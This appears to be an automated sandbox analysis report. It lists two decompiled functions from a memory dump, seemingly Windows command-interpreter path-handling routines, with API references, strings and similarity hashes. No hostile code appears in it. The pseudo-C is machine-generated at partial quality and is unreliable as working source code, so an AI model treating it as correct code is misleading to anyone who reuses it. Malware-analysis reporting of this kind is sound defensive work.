Uniqueness Score: -1.00%

Function 4A73B8B1, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 370
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E4A73B8B1(void* __edx, void* __eflags, long _a4, intOrPtr _a8, char _a12, signed int _a16, intOrPtr _a20) {
				signed int _v8;
				short _v12;
				short _v14;
				char _v16;
				short _v536;
				short _v1056;
				short _v1576;
				char _v1577;
				char _v1578;
				char _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t97;
				short _t102;
				short _t103;
				long _t105;
				intOrPtr _t111;
				intOrPtr _t113;
				intOrPtr _t122;
				signed int _t126;
				intOrPtr* _t137;
				long _t143;
				signed int _t144;
				intOrPtr* _t146;
				signed int _t150;
				short* _t151;
				WCHAR* _t153;
				intOrPtr* _t164;
				long _t170;
				intOrPtr* _t174;
				long _t189;
				void* _t196;
				signed int _t197;
				void* _t198;
				intOrPtr _t215;
				void* _t217;
				intOrPtr _t222;
				signed int _t230;
				long _t231;
				signed int _t232;

				_t97 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t97 ^ _t232;
				_t231 = _a4;
				_v1612 = _a8;
				_v1592 = _a16;
				_t197 = E4A73B512(_t196, __edx, _t231, 0x20);
				_t102 = 0x2a;
				_v16 = _t102;
				_t103 = 0x3f;
				_v14 = _t103;
				_v12 = 0;
				_t105 = _t231;
				_t198 = _t105 + 2;
				do {
					_t222 =  *_t105;
					_t105 = _t105 + 2;
				} while (_t222 != 0);
				E4A731996(_t231,  &_v16);
				asm("sbb edi, edi");
				_t230 =  ~(_t105 - _t198 >> 1);
				_v1600 = _t230;
				if(_t197 == 0xffffffff) {
					if(_a20 == 0) {
						L5:
						_v1578 = 2;
						L6:
						_v1577 = 1;
						L7:
						_t197 = _v1592;
						_t111 = 0x20;
						_v1604 = _t111;
						if(E4A733117(_t231, _t111,  *(_t197 + 0x18),  &_v1584) == 0) {
							_t113 = 0x10;
							_v1604 = _t113;
							if((E4A733117(_t231, _t113,  *(_t197 + 0x18),  &_v1584) & 0x000000ff) != 0) {
								goto L8;
							}
							_t189 =  *0x4a754128; // 0x0
							if(_t189 != 0x12) {
								if(_t230 != 0) {
									L37:
									_t189 = 0x234d;
									L40:
									_push(_t189);
									L41:
									L4A74DF02(_t207, _t222);
									L42:
									if(_a20 == 0) {
										_push(0x40002720);
										goto L41;
									}
									_v1578 = 1;
									_v1577 = 0;
									goto L7;
								}
								goto L40;
							}
							_t189 = 2;
							goto L40;
						}
						L8:
						_v1588 = _v1588 & 0x00000000;
						_v1592 = _v1592 & 0x00000000;
						_t231 = 0x104;
						E4A73185A( &_v1056, 0x104, 0x104);
						_t122 = E4A732148( &_v1056,  *0x4a770664 & 0x0000ffff) + 2;
						_v1616 = _t122;
						while( *0x4a7541b4 == 0) {
							_t207 = _t122 -  &_v1056 >> 1;
							E4A73185A(_t122, _t231 - (_t122 -  &_v1056 >> 1),  &(( *(_t197 + 0x18))[0x2c]));
							E4A73185A( &_v536, _t231, _v1612);
							if(_v1578 == 1) {
								E4A73185A(E4A732148( &_v536,  *0x4a770664 & 0x0000ffff) + 2, _t231 - (E4A732148( &_v536,  *0x4a770664 & 0x0000ffff) + 2 -  &_v536 >> 1),  &(( *(_t197 + 0x18))[0x2c]));
								_t137 =  &_v536;
								_t207 = _t137 + 2;
								do {
									_t222 =  *_t137;
									_t137 = _t137 + 2;
								} while (_t222 != 0);
								if(_t137 - _t207 >> 1 <= _t231) {
									goto L11;
								}
								E4A732F5C(_v1584);
								E4A73963C();
								_push(0x232e);
								goto L41;
							}
							L11:
							_t143 = GetFullPathNameW( &_v536, _t231,  &_v1576, 0);
							if(_t143 == 0 || _t143 >= _t231) {
								L33:
								_t144 = GetLastError();
								_t230 = _t144;
								if(_t230 != 0xb7) {
									if(_t230 == 1) {
										_t230 = 0x40002730;
									}
								} else {
									_t230 = 0x234d;
								}
								goto L59;
							} else {
								_t164 =  &_v1576;
								_t222 = _t164 + 2;
								do {
									_t207 =  *_t164;
									_t164 = _t164 + 2;
								} while (_t207 != 0);
								_t230 = _t164 - _t222 >> 1;
								_t170 = GetFullPathNameW( &_v1056, _t231,  &_v1576, 0);
								if(_t170 == 0 || _t170 >= _t231) {
									goto L33;
								} else {
									if(E4A73BBA4(_t230,  &_v1576, _t231,  &_v1596) == 0) {
										L66:
										if(E4A7395F8( *(_t197 + 0x18), _v1604, _v1584) == 0) {
											L25:
											E4A732F5C(_v1584);
											E4A73963C();
											_push(_v1588);
											_push("%9d");
											if(( *( *(_t197 + 0x18)) & 0x00000010) != 0) {
												_push(E4A739A2C());
												_push(1);
												_push(0x236d);
											} else {
												_push(E4A739A2C());
												_push(1);
												_push(0x236e);
											}
											E4A7399E1(_t217);
											_t126 = 0 | _v1592 != 0x00000000;
											L28:
											return E4A7313A9(_t126, _t197, _v8 ^ _t232, _t222, _t230, _t231);
										}
										_t122 = _v1616;
										continue;
									}
									_t174 =  &_v1576;
									_t222 = _t174 + 2;
									do {
										_t207 =  *_t174;
										_t174 = _t174 + 2;
									} while (_t207 != 0);
									_v1596 = _v1596 - (_t174 - _t222 >> 1);
									_t230 = _t230 + _v1596;
									if(_t230 > _t231) {
										_t230 = 0xce;
										L59:
										_v1592 = _t230;
										if(_v1600 != 0) {
											E4A7358F3(L"%s\r\n",  &_v1056);
											_pop(_t207);
										}
										_push(0);
										_push(_t230);
										E4A736D44(_t207);
										_t146 =  &_v536;
										_t222 = _t146 + 2;
										do {
											_t215 =  *_t146;
											_t146 = _t146 + 2;
										} while (_t215 != 0);
										_t150 = (_t146 - _t222 >> 1) - 1;
										_v1596 = _t150;
										_t151 = _t232 + _t150 * 2 - 0x214;
										if( *_t151 == 0x2e) {
											 *_t151 = 0;
										}
										_t153 =  &_v1056;
										__imp___wcsicmp( &_v536);
										_t217 = _t153;
										if(_t153 != 0) {
											L24:
											if(_v1577 == 0) {
												goto L66;
											}
										} else {
										}
										goto L25;
									}
									if(E4A73BB60( &_v1056,  &_v536,  &_a12,  &_v1608) == 0) {
										goto L33;
									}
									if(_v1608 != 0) {
										_v1588 = _v1588 + 1;
										if(_v1600 != 0) {
											E4A7358F3(L"%s\r\n",  &_v1056);
											_pop(_t217);
										}
									}
									goto L24;
								}
							}
						}
						E4A732F5C(_v1584);
						E4A73963C();
						_t126 = 1;
						goto L28;
					}
					if(E4A73BB60(_t231, _v1612,  &_a12,  &_v1608) == 0) {
						_t189 = GetLastError();
						if(_t189 != 0xb7) {
							if(_t189 == 1) {
								_t189 = 0x40002730;
							}
							goto L40;
						}
						goto L37;
					}
					E4A73963C();
					E4A7399E1(_t198, 0x236d, 1, E4A739A2C("%9d", 1));
					_t126 = 0;
					goto L28;
				}
				if(_t197 > 1) {
					goto L42;
				}
				_v1578 = 1;
				if(_a20 != 0) {
					goto L6;
				}
				goto L5;
			}

0x4a73b8bc
0x4a73b8c3
0x4a73b8cb
0x4a73b8cf
0x4a73b8db
0x4a73b8e6
0x4a73b8ea
0x4a73b8eb
0x4a73b8f1
0x4a73b8f2
0x4a73b8f8
0x4a73b8fc
0x4a73b8fe
0x4a73b901
0x4a73b901
0x4a73b905
0x4a73b906
0x4a73b916
0x4a73b91d
0x4a73b91f
0x4a73b921
0x4a73b92a
0x4a740e1a
0x4a73b946
0x4a73b946
0x4a73b94d
0x4a73b94d
0x4a73b954
0x4a73b954
0x4a73b95c
0x4a73b967
0x4a73b976
0x4a745ed9
0x4a745ee4
0x4a745ef6
0x00000000
0x00000000
0x4a745efc
0x4a745f04
0x4a745f0d
0x4a745ea0
0x4a745ea0
0x4a745eb1
0x4a745eb1
0x4a745eb2
0x4a745eb2
0x4a745eb7
0x4a745ebb
0x4a745ed0
0x00000000
0x4a745ed0
0x4a745ebd
0x4a745ec4
0x00000000
0x4a745ec4
0x00000000
0x4a745f0f
0x4a745f08
0x00000000
0x4a745f08
0x4a73b97c
0x4a73b97c
0x4a73b983
0x4a73b98b
0x4a73b998
0x4a73b9b2
0x4a73b9b3
0x4a73b9b9
0x4a73b9d7
0x4a73b9df
0x4a73b9f2
0x4a73b9fe
0x4a745f40
0x4a745f45
0x4a745f4b
0x4a745f4e
0x4a745f4e
0x4a745f52
0x4a745f53
0x4a745f5e
0x00000000
0x00000000
0x4a746045
0x4a74604a
0x4a74604f
0x00000000
0x4a74604f
0x4a73ba04
0x4a73ba15
0x4a73ba1d
0x4a740e67
0x4a740e67
0x4a745f70
0x4a745f78
0x4a745f84
0x4a745f86
0x4a745f86
0x4a745f7a
0x4a745f7a
0x4a745f7a
0x00000000
0x4a73ba2b
0x4a73ba2b
0x4a73ba31
0x4a73ba34
0x4a73ba34
0x4a73ba38
0x4a73ba39
0x4a73ba42
0x4a73ba55
0x4a73ba5d
0x00000000
0x4a73ba6b
0x4a73ba81
0x4a746000
0x4a746016
0x4a73bb03
0x4a73bb09
0x4a73bb0e
0x4a73bb19
0x4a73bb1f
0x4a73bb24
0x4a74605e
0x4a74605f
0x4a746061
0x4a73bb2a
0x4a73bb2f
0x4a73bb30
0x4a73bb32
0x4a73bb32
0x4a73bb37
0x4a73bb47
0x4a73bb4a
0x4a73bb58
0x4a73bb58
0x4a74601c
0x00000000
0x4a74601c
0x4a73ba87
0x4a73ba8d
0x4a73ba90
0x4a73ba90
0x4a73ba94
0x4a73ba95
0x4a73ba9e
0x4a73baaa
0x4a73baae
0x4a745f69
0x4a745f8b
0x4a745f92
0x4a745f98
0x4a745fa6
0x4a745fac
0x4a745fac
0x4a745fad
0x4a745faf
0x4a745fb0
0x4a745fb6
0x4a745fbd
0x4a745fc0
0x4a745fc0
0x4a745fc4
0x4a745fc5
0x4a745fce
0x4a745fcf
0x4a745fd5
0x4a745fe0
0x4a745fe4
0x4a745fe4
0x4a745fee
0x4a745ff5
0x4a740e73
0x4a740e76
0x4a73baf6
0x4a73bafd
0x00000000
0x00000000
0x00000000
0x4a740e7c
0x00000000
0x4a740e76
0x4a73bad4
0x00000000
0x00000000
0x4a73bae1
0x4a73bae3
0x4a73baf0
0x4a7401f5
0x4a7401fb
0x4a7401fb
0x4a73baf0
0x00000000
0x4a73bae1
0x4a73ba5d
0x4a73ba1d
0x4a74602d
0x4a746032
0x4a746039
0x00000000
0x4a746039
0x4a740e39
0x4a745e93
0x4a745e9e
0x4a745eaa
0x4a745eac
0x4a745eac
0x00000000
0x4a745eaa
0x00000000
0x4a745e9e
0x4a740e3f
0x4a740e58
0x4a740e60
0x00000000
0x4a740e60
0x4a73b933
0x00000000
0x00000000
0x4a73b93d
0x4a73b944
0x00000000
0x00000000
0x00000000

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,00000000,00000002,00000104,?,?,00000000,?,00000104,?,00000002,00000104,?,?), ref: 4A73BA15
GetFullPathNameW.KERNEL32(?,00000104,?,00000000,?,00000000), ref: 4A73BA55
GetLastError.KERNEL32(?,00000000), ref: 4A740E67
_wcsicmp.MSVCRT ref: 4A745FF5

Part of subcall function 4A73BBA4: GetFileAttributesW.KERNEL32(00000000,00000104,?), ref: 4A73BC05

Strings

%9d, xrefs: 4A73BB1F, 4A740E46
%s, xrefs: 4A7401F0, 4A745FA1

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: FullNamePath$AttributesErrorFileLast_wcsicmp
String ID: %9d$%s
API String ID: 133037402-3662383364
Opcode ID: 2dd081fc919da0d8457b62fe0c510f9c55f4181b4ccae45165aba222f943843a
Instruction ID: 266ab0d60b5ff13bb4020c8f04660156d65c25db4a948304ba81217554e244cd
Opcode Fuzzy Hash: 2dd081fc919da0d8457b62fe0c510f9c55f4181b4ccae45165aba222f943843a
Instruction Fuzzy Hash: 5FD1E571909529AADB31DB64CC88BEE7BB9EF98310F0100D5E509DB082DB759F9CCB61

Uniqueness

Uniqueness Score: -1.00%

Function 4A737607, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 322
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E4A737607(void* __eax, void* __ebx, signed int __edx, WCHAR* __edi, WCHAR* __esi) {
				signed int _t169;
				WCHAR* _t172;
				WCHAR* _t173;
				long _t188;
				WCHAR* _t195;
				WCHAR* _t198;
				signed char _t199;
				signed int _t206;
				short _t229;
				short _t248;
				short _t252;
				short* _t253;
				WCHAR* _t256;
				short* _t261;
				WCHAR* _t262;
				WCHAR* _t270;
				void* _t272;
				WCHAR* _t273;
				void* _t278;
				short _t303;
				signed int _t314;
				signed int _t319;
				WCHAR* _t320;
				void* _t321;
				void* _t325;
				WCHAR* _t326;
				WCHAR* _t330;
				void* _t331;
				WCHAR* _t339;
				WCHAR* _t342;
				wchar_t* _t347;
				signed int _t349;
				void* _t351;

				L0:
				while(1) {
					L0:
					_t330 = __esi;
					_t320 = __edi;
					_t317 = __edx;
					if(__eax == 0x24) {
						goto L19;
					}
					L9:
					 *__ebx(__eax) = __ax & 0x0000ffff;
					__eax =  *__edi(L"fdpnxsatz", __ax & 0x0000ffff);
					__esp = __esp + 0xc;
					__eflags = __eax;
					if(__eax == 0) {
						goto L19;
					}
					L10:
					__eax =  *__esi & 0x0000ffff;
					__eax =  *__edi( *((intOrPtr*)(__ebp - 0x840)),  *__esi & 0x0000ffff);
					_pop(__ecx);
					_pop(__ecx);
					__eflags = __eax;
					if(__eax != 0) {
						__eax =  *(__ebp - 0x828);
						 *(__ebp - 0x848) = __esi;
						 *(__ebp - 0x834) =  *(__ebp - 0x828);
					}
					__eax =  *__esi & 0x0000ffff;
					__eax =  *__ebx( *__esi & 0x0000ffff);
					__eax = __ax & 0x0000ffff;
					__eflags = __eax - 0x70;
					_pop(__ecx);
					if(__eflags > 0) {
						L59:
						__eax = __eax - 0x73;
						__eflags = __eax;
						if(__eax == 0) {
							L77:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008020;
							goto L18;
						}
						L60:
						__eax = __eax - 1;
						__eflags = __eax;
						if(__eax == 0) {
							L76:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00004200;
							goto L18;
						}
						L61:
						__eax = __eax - 4;
						__eflags = __eax;
						if(__eax != 0) {
							L74:
							__eax = __eax - 1;
							__eax = __eax - 1;
							__eflags = __eax;
							if(__eax != 0) {
								goto L67;
							}
							L75:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00004400;
							goto L18;
						}
						L62:
						 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008010;
						goto L18;
					} else {
						L12:
						if(__eflags == 0) {
							L57:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008004;
							L18:
							_t330 =  &(_t330[1]);
							__eflags =  *_t330 & 0x0000ffff;
							if(( *_t330 & 0x0000ffff) != 0) {
								continue;
							}
							goto L19;
						}
						L13:
						__eax = __eax - 0x61;
						__eflags = __eax;
						if(__eax == 0) {
							L73:
							 *(_t349 - 0x828) =  *(_t349 - 0x828) | 0x00004100;
							goto L18;
						}
						L14:
						__eax = __eax - 3;
						__eflags = __eax;
						if(__eax == 0) {
							L56:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008002;
							goto L18;
						}
						L15:
						__eax = __eax - 1;
						__eax = __eax - 1;
						__eflags = __eax;
						if(__eax == 0) {
							L65:
							 *(__ebp - 0x828) =  *(__ebp - 0x828) | 0x00008001;
							goto L18;
						}
						L16:
						__eax = __eax - 8;
						__eflags = __eax;
						if(__eax != 0) {
							L67:
							__eflags =  *(_t349 - 0x830);
							if( *(_t349 - 0x830) == 0) {
								L69:
								_t173 = 0;
								L3:
								_pop(_t321);
								_pop(_t331);
								_pop(_t272);
								return E4A7313A9(_t173, _t272,  *(_t349 - 4) ^ _t349, _t317, _t321, _t331);
							}
							L68:
							E4A736D44(_t278, 0x400023a8, 1,  *((intOrPtr*)(_t349 - 0x844)));
							_t351 = _t351 + 0xc;
							L83:
							__imp__longjmp( *(_t349 - 0x830), 0xffffffff);
							goto L73;
						} else {
							_t4 = __ebp - 0x828;
							 *_t4 =  *(__ebp - 0x828) | 0x00008008;
							__eflags =  *_t4;
							goto L18;
						}
					}
					L19:
					_t169 =  *_t330 & 0x0000ffff;
					 *(_t349 - 0x838) =  *(_t349 - 0x838) & 0x00000000;
					__eflags = _t169;
					if(_t169 == 0) {
						L63:
						_t330 =  *(_t349 - 0x848);
						 *(_t349 - 0x828) =  *(_t349 - 0x834);
						L22:
						_t172 =  *_t320( *((intOrPtr*)(_t349 - 0x840)),  *_t330 & 0x0000ffff);
						_pop(_t278);
						__eflags = _t172;
						if(_t172 == 0) {
							goto L67;
						}
						L23:
						_t320 =  *( *(_t349 - 0x83c) + (_t172 -  *((intOrPtr*)(_t349 - 0x840)) >> 1) * 4);
						__eflags = _t320;
						if(_t320 == 0) {
							L26:
							 *( *(_t349 - 0x84c)) = (_t330 -  *((intOrPtr*)(_t349 - 0x844)) + 2 >> 1) - 1;
							__eflags = _t320;
							if(_t320 == 0) {
								L4:
								__eflags =  *( *(_t349 - 0x84c));
								_t173 = E4A733AFC;
								if( *( *(_t349 - 0x84c)) == 0) {
									L2:
									_t173 = _t320;
								}
								goto L3;
							}
							L27:
							__eflags =  *_t320;
							if( *_t320 == 0) {
								L1:
								if(_t320 == 0) {
									goto L4;
								}
								goto L2;
							}
							L28:
							__eflags =  *(_t349 - 0x828) & 0x0000c000;
							if(( *(_t349 - 0x828) & 0x0000c000) == 0) {
								L58:
								_push(_t320);
								L49:
								_t320 = E4A7319D6();
								goto L1;
							}
							L29:
							 *(_t349 - 0x824) = 0;
							__eflags =  *(_t349 - 0x838);
							if( *(_t349 - 0x838) != 0) {
								L87:
								__eflags =  *(_t349 - 0x838) - 0xffffffff;
								if( *(_t349 - 0x838) == 0xffffffff) {
									L91:
									_t320 = 0;
									goto L31;
								}
								L88:
								_t256 = SearchPathW( *(_t349 - 0x838), _t320, 0, 0x208, _t349 - 0x824, _t349 - 0x82c);
								 *(_t349 - 0x850) = _t256;
								__eflags = _t256;
								if(_t256 == 0) {
									goto L91;
								}
								L89:
								__eflags =  *(_t349 - 0x828);
								if( *(_t349 - 0x828) == 0) {
									 *(_t349 - 0x828) =  *(_t349 - 0x828) | 0x00008001;
								}
								goto L31;
							} else {
								 *(_t349 - 0x850) = GetFullPathNameW(_t320, 0x208, _t349 - 0x824, _t349 - 0x82c);
								L31:
								 *(_t349 - 0x834) =  *(_t349 - 0x828) & 0x00000020;
								E4A736E47(_t349 - 0x824, 0x208,  *(_t349 - 0x828) & 0x00000020);
								_t188 = wcsrchr(_t349 - 0x824, 0x5c);
								 *(_t349 - 0x82c) = _t188;
								__eflags = _t188;
								if(_t188 == 0) {
									 *(_t349 - 0x82c) = wcsrchr(_t349 - 0x824, _t188);
								} else {
									_t29 = _t349 - 0x82c;
									 *_t29 =  &(( *(_t349 - 0x82c))[0]);
									__eflags =  *_t29;
								}
								__eflags =  *(_t349 - 0x850);
								if( *(_t349 - 0x850) == 0) {
									goto L1;
								} else {
									L34:
									 *(_t349 - 0x414) = 0;
									memset(_t349 - 0x412, 0, 0x40e);
									_t195 =  *(_t349 - 0x828) & 0x00004000;
									__eflags = _t195;
									_t339 = _t349 - 0x414;
									 *(_t349 - 0x83c) = _t195;
									_t325 = 0x207;
									if(_t195 != 0) {
										L93:
										_t198 = GetFileAttributesExW(_t349 - 0x824, 0, _t349 - 0x878);
										__eflags = _t198;
										if(_t198 == 0) {
											goto L35;
										}
										L94:
										__eflags =  *(_t349 - 0x828) & 0x00000100;
										if(( *(_t349 - 0x828) & 0x00000100) == 0) {
											L102:
											__eflags =  *(_t349 - 0x828) & 0x00000200;
											if(( *(_t349 - 0x828) & 0x00000200) != 0) {
												E4A742513(_t349 - 0x864, _t349 - 0x89c);
												__eflags = _t339 - _t349 - 0x414;
												if(_t339 != _t349 - 0x414) {
													__eflags = _t339 - _t349 - 0x414 >> 1 - _t325;
													if(_t339 - _t349 - 0x414 >> 1 < _t325) {
														_t252 = 0x20;
														 *_t339 = _t252;
														_t339 =  &(_t339[1]);
														__eflags = _t339;
													}
												}
												_t342 =  &(_t339[E4A74270D(_t349 - 0x89c, 0, _t339, 0x104 - (_t339 - _t349 - 0x414 >> 1))]);
												__eflags = _t342 - _t349 - 0x414;
												if(_t342 != _t349 - 0x414) {
													__eflags = _t342 - _t349 - 0x414 >> 1 - 0x207;
													if(_t342 - _t349 - 0x414 >> 1 < 0x207) {
														_t248 = 0x20;
														 *_t342 = _t248;
														_t342 =  &(_t342[1]);
														__eflags = _t342;
													}
												}
												__eflags = 0x104 - (_t342 - _t349 - 0x414 >> 1);
												_t339 =  &(_t342[E4A73D701(_t342, _t349 - 0x89c, 0, _t342, 0x104 - (_t342 - _t349 - 0x414 >> 1))]);
												_t325 = 0x207;
											}
											__eflags =  *(_t349 - 0x828) & 0x00000400;
											if(( *(_t349 - 0x828) & 0x00000400) != 0) {
												__eflags = _t339 - _t349 - 0x414;
												if(_t339 != _t349 - 0x414) {
													__eflags = _t339 - _t349 - 0x414 >> 1 - _t325;
													if(_t339 - _t349 - 0x414 >> 1 < _t325) {
														_t229 = 0x20;
														 *_t339 = _t229;
														_t339 =  &(_t339[1]);
														__eflags = _t339;
													}
												}
												 *((intOrPtr*)(_t349 - 0x854)) =  *((intOrPtr*)(_t349 - 0x858));
												 *(_t349 - 0x850) =  *(_t349 - 0x85c);
												_t339 =  &(_t339[E4A74292F(0, _t349 - 0x854, 0, _t339, 0x208 - (_t339 - _t349 - 0x414 >> 1))]);
											}
											goto L35;
										}
										L95:
										_t314 = 0;
										__eflags =  *0x4a77088c - _t314; // 0x64
										if(__eflags == 0) {
											goto L102;
										}
										L96:
										_t253 = 0x4a77088c;
										while(1) {
											L97:
											_t317 = _t314 >> 1;
											__eflags = _t314 >> 1 - _t325;
											if(_t314 >> 1 >= _t325) {
												goto L102;
											}
											L98:
											_t319 =  *(_t349 - 0x878);
											__eflags =  *(_t253 - 4) & _t319;
											if(( *(_t253 - 4) & _t319) == 0) {
												_t317 = 0x2d;
											} else {
												_t317 =  *_t253;
											}
											 *_t339 = _t317;
											_t339 =  &(_t339[1]);
											_t253 = _t253 + 8;
											_t314 = _t314 + 2;
											__eflags =  *_t253;
											if( *_t253 != 0) {
												continue;
											} else {
												goto L102;
											}
										}
										goto L102;
									}
									L35:
									_t199 =  *(_t349 - 0x828);
									__eflags = _t199 & 0x00008000;
									if((_t199 & 0x00008000) == 0) {
										L115:
										__eflags =  *(_t349 - 0x83c);
										if( *(_t349 - 0x83c) == 0) {
											goto L36;
										}
										L116:
										L48:
										_push(_t349 - 0x414);
										goto L49;
									}
									L36:
									__eflags = _t339 - _t349 - 0x414;
									if(_t339 != _t349 - 0x414) {
										_t317 = _t349 - 0x414;
										__eflags = _t339 - _t349 - 0x414 >> 1 - _t325;
										if(_t339 - _t349 - 0x414 >> 1 < _t325) {
											_t303 = 0x20;
											 *_t339 = _t303;
											_t339 =  &(_t339[1]);
										}
									}
									__eflags = _t199 & 0x00000001;
									if((_t199 & 0x00000001) != 0) {
										L47:
										__eflags = 0x208 - (_t339 - _t349 - 0x414 >> 1);
										E4A73185A(_t339, 0x208 - (_t339 - _t349 - 0x414 >> 1), _t349 - 0x824);
										goto L48;
									} else {
										L38:
										__eflags =  *(_t349 - 0x834);
										if( *(_t349 - 0x834) != 0) {
											L70:
											__eflags = _t199 & 0x0000001e;
											if((_t199 & 0x0000001e) != 0) {
												goto L39;
											}
											L71:
											goto L47;
										}
										L39:
										_t326 = _t349 - 0x820;
										__eflags = _t199 & 0x00000002;
										if((_t199 & 0x00000002) == 0) {
											E4A73185A(_t349 - 0x824, 0x208, _t326);
											_t48 = _t349 - 0x82c;
											 *_t48 =  *(_t349 - 0x82c) - 4;
											__eflags =  *_t48;
											_t326 = _t349 - 0x824;
										}
										L41:
										__eflags =  *(_t349 - 0x828) & 0x00000004;
										if(( *(_t349 - 0x828) & 0x00000004) == 0) {
											__eflags = 0x208 - (_t326 - _t349 - 0x824 >> 1);
											E4A73185A(_t326, 0x208 - (_t326 - _t349 - 0x824 >> 1),  *(_t349 - 0x82c));
											 *(_t349 - 0x82c) = _t326;
										}
										L43:
										_t206 = wcsrchr( *(_t349 - 0x82c), 0x2e);
										__eflags = _t206;
										if(_t206 == 0) {
											 *(_t349 - 0x83c) =  *(_t349 - 0x83c) & _t206;
											_t206 = _t349 - 0x83c;
										}
										__eflags =  *(_t349 - 0x828) & 0x00000010;
										if(( *(_t349 - 0x828) & 0x00000010) == 0) {
											__eflags = 0;
											 *_t206 = 0;
										}
										__eflags =  *(_t349 - 0x828) & 0x00000008;
										if(( *(_t349 - 0x828) & 0x00000008) == 0) {
											E4A73185A( *(_t349 - 0x82c), 0x208 - ( *(_t349 - 0x82c) - _t349 - 0x824 >> 1), _t206);
										}
										goto L47;
									}
								}
							}
						}
						L24:
						__eflags =  *_t320 - 0x22;
						if( *_t320 == 0x22) {
							L6:
							_t320 = E4A7319D6( &(_t320[1]));
							__eflags = _t320;
							if(_t320 == 0) {
								L80:
								__eflags =  *(_t349 - 0x830);
								if( *(_t349 - 0x830) != 0) {
									goto L83;
								}
								L81:
								goto L69;
							} else {
								_t261 = E4A732ED1(_t320);
								__eflags =  *_t261 - 0x22;
								if( *_t261 == 0x22) {
									 *_t261 = 0;
								}
								goto L26;
							}
						}
						L25:
						__eflags =  *_t330 - 0x30;
						if( *_t330 == 0x30) {
							_t262 =  *0x4a7540b4; // 0x0
							__eflags = _t262;
							if(_t262 != 0) {
								__eflags = _t262[0x46] - _t320;
								if(_t262[0x46] == _t320) {
									__eflags =  *(_t349 - 0x838);
									if( *(_t349 - 0x838) == 0) {
										__eflags =  *(_t349 - 0x828) & 0x0000c000;
										if(( *(_t349 - 0x828) & 0x0000c000) != 0) {
											_t320 =  *_t262;
										}
									}
								}
							}
						}
						goto L26;
					}
					L20:
					__eflags = _t169 - 0x24;
					if(_t169 == 0x24) {
						L78:
						_t347 =  &(_t330[1]);
						 *(_t349 - 0x834) = _t347;
						_t330 = wcschr(_t347, 0x3a);
						_pop(_t278);
						__eflags = _t330;
						if(_t330 == 0) {
							goto L67;
						}
						L79:
						_t320 = (_t330 -  *(_t349 - 0x834) >> 1) + 1;
						_t273 = E4A731896(_t320 + _t320);
						__eflags = _t273;
						if(_t273 != 0) {
							L84:
							E4A734B3D(_t273, _t320,  *(_t349 - 0x834), _t320 - 1);
							 *(_t349 - 0x838) = E4A73321B(_t278, _t273);
							E4A73142E(_t273);
							__eflags =  *(_t349 - 0x838);
							if( *(_t349 - 0x838) == 0) {
								_t113 = _t349 - 0x838;
								 *_t113 =  *(_t349 - 0x838) | 0xffffffff;
								__eflags =  *_t113;
							}
							_t320 = wcsrchr;
							_t330 =  &(_t330[1]);
							 *(_t349 - 0x828) =  *(_t349 - 0x828) | 0x00008000;
							goto L22;
						}
						goto L80;
					}
					L21:
					_t270 =  *_t320( *((intOrPtr*)(_t349 - 0x840)), _t169);
					__eflags = _t270;
					if(_t270 == 0) {
						goto L63;
					}
					goto L22;
				}
			}

0x4a737607
0x4a737607
0x4a737607
0x4a737607
0x4a737607
0x4a737607
0x4a73760b
0x00000000
0x00000000
0x4a73760d
0x4a737610
0x4a737619
0x4a73761b
0x4a73761e
0x4a737620
0x00000000
0x00000000
0x4a737622
0x4a737622
0x4a73762c
0x4a73762e
0x4a73762f
0x4a737630
0x4a737632
0x4a73fd30
0x4a73fd36
0x4a73fd3c
0x4a73fd3c
0x4a737638
0x4a73763c
0x4a73763e
0x4a737641
0x4a737644
0x4a737645
0x4a73fcf1
0x4a73fcf1
0x4a73fcf1
0x4a73fcf4
0x4a746c03
0x4a746c03
0x00000000
0x4a746c03
0x4a73fcfa
0x4a73fcfa
0x4a73fcfa
0x4a73fcfb
0x4a746bf4
0x4a746bf4
0x00000000
0x4a746bf4
0x4a73fd01
0x4a73fd01
0x4a73fd01
0x4a73fd04
0x4a746bdd
0x4a746bdd
0x4a746bde
0x4a746bde
0x4a746bdf
0x00000000
0x00000000
0x4a746be5
0x4a746be5
0x00000000
0x4a746be5
0x4a73fd0a
0x4a73fd0a
0x00000000
0x4a73764b
0x4a73764b
0x4a73764b
0x4a737990
0x4a737990
0x4a73767e
0x4a73767f
0x4a737683
0x4a737686
0x00000000
0x00000000
0x00000000
0x4a737686
0x4a737651
0x4a737651
0x4a737651
0x4a737654
0x4a746bce
0x4a746bce
0x00000000
0x4a746bce
0x4a73765a
0x4a73765a
0x4a73765a
0x4a73765d
0x4a737981
0x4a737981
0x00000000
0x4a737981
0x4a737663
0x4a737663
0x4a737664
0x4a737664
0x4a737665
0x4a73fd47
0x4a73fd47
0x00000000
0x4a73fd47
0x4a73766b
0x4a73766b
0x4a73766b
0x4a73766e
0x4a742374
0x4a742374
0x4a74237b
0x4a742382
0x4a742382
0x4a7351bc
0x4a7351bf
0x4a7351c0
0x4a7351c3
0x4a7351ca
0x4a7351ca
0x4a74237d
0x4a746c64
0x4a746c69
0x4a746c6c
0x4a746bc8
0x00000000
0x4a737674
0x4a737674
0x4a737674
0x4a737674
0x00000000
0x4a737674
0x4a73766e
0x4a73768c
0x4a73768c
0x4a73768f
0x4a737696
0x4a737699
0x4a73fd19
0x4a73fd1f
0x4a73fd25
0x4a7376bc
0x4a7376c6
0x4a7376c9
0x4a7376ca
0x4a7376cc
0x00000000
0x00000000
0x4a7376d2
0x4a7376e0
0x4a7376e8
0x4a7376ea
0x4a737700
0x4a737711
0x4a737713
